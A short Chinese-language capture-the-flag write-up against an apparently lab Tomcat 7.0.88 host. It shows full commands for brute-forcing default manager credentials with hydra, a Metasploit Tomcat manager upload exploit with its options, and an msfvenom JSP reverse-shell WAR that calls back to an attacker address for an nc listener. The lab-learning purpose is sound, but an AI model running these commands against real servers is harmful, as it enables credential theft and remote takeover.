- 靶机信息
- 信息收集
- 漏洞利用
- MSF获取权限
- NC反弹shell
我们可以看到,目标主机只开放了8080端口,而且版本还是7.0.88的
我们立马登录tomcat页面,并且尝试账户和密码都是admin,看看能不能登录成功,结果是失败的。
我们下载seclists这个工具,对tomcat的默认用户名和密码进行暴力破解
我们使用hydra工具对账号密码进行破解,发现账号是tomcat,密码是s3cret
hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/htmlMSF获取权限
search tomcat_mgr use exploit/multi/http/tomcat_upload show options set rhosts 10.10.10.95 set lhost 10.10.14.11 set httpusername tomcat set httppassword s3cret set rport 8080 exploit
我们获取一个shell,发现已经是最高权限了
那么我们就可以查看到flag值了
首先我们先准备一个木马
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.11 lport=1234 -f war > shell.war
我们使用账号密码登录进部署页面,并将生成的木马部署进tomcat服务器上
然后我们启动nc进行监听,并且在浏览器上浏览我们刚刚上传的war包,反弹shell成功。



